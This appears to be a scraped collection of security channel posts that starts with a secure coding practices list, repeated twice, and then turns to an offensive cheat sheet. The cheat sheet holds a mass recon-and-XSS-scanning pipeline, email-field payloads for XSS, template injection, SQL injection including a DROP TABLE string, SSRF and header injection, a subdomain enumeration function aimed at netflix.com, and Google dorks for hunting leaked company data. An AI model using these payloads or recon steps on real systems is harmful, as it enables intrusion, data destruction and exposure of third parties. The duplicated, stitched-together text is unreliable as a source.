Top 10 Secure Coding Practices
1. Validate input.
2. Heed compiler warnings.
3. Architect and design for security policies.
4. Keep it simple.
5. Default deny.
6. Adhere to the principle of least privilege.
7. Sanitize data sent to other systems.
8. Practice defense in depth.
9. Use effective quality assurance techniques.
10. Adopt a secure coding standard.
https://wiki.sei.cmu.edu/confluence/display/seccode/Top+10+Secure+Coding+Practices
Bonus Secure Coding Practices
1. Define security requirements.
2. Model threats.
1. Validate input.
2. Heed compiler warnings.
3. Architect and design for security policies.
4. Keep it simple.
5. Default deny.
6. Adhere to the principle of least privilege.
7. Sanitize data sent to other systems.
8. Practice defense in depth.
9. Use effective quality assurance techniques.
10. Adopt a secure coding standard.
https://wiki.sei.cmu.edu/confluence/display/seccode/Top+10+Secure+Coding+Practices
Bonus Secure Coding Practices
1. Define security requirements.
2. Model threats.
Forwarded from DIMOOON 🇺🇦🦅🇺🇸
MongoDB Pentesting for Absolute Beginners.pdf
3 MB
пентест монгодб, написано, как для ежей от ежей постарше.
cat subs.txt | waybackurl > wayback
cat subs.txt | gau | anew wayback
cat subs.txt | hakrawler -depth 3 -plain | anew wayback
cat wayback | dalfox pipe -o result.txt
Email payloads:
XSS:
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
Template Injection:
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
SQLinj:
"' OR 1=1 -- '"@example.com
"mail'); DROP TABLE users;--"@example.com
SSRF:
john.doe@abc123.burpcollaborator.net
john.doe@[127.0.0.1]
Parametr Pollution:
victim&email=attacker@example.com
Email Header Injection:
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"recipient@test.com>\r\nRCPT TO:<victim+"@test.com
Find Subdomains
rapiddns(){
curl -s "https://rapiddns.io/subdomain/$1?full=1" \
| grep -oP '_blank">\K[^<]*' \
| grep -v http \
| sort -u
}
rapiddns netflix.com
Google dorks
site:codepad.co "company"
site:scribd.com "company"
site:npmjs.com "company"
site:npm.runkit.com "company"
site:libraries.io "company"
site:ycombinator.com "company"
site:coggle.it "company"
site:papaly.com "company"
site:google.com "company"
site:trello.com "company"
site:prezi.com "company"
site:jsdelivr.net "company"
site:codepen.io "company"
site:codeshare.io "company"
site:sharecode.io "company"
site:pastebin.com "company"
site:repl.it "company"
site:productforums.google.com "company"
site:gitter.im "company"
site:bitbucket.org "company"
site:zoom.us inurl:"company"
site:atlassian.net "company"
site:s3.amazonaws.com inurl:"company"
inurl:gitlab "company"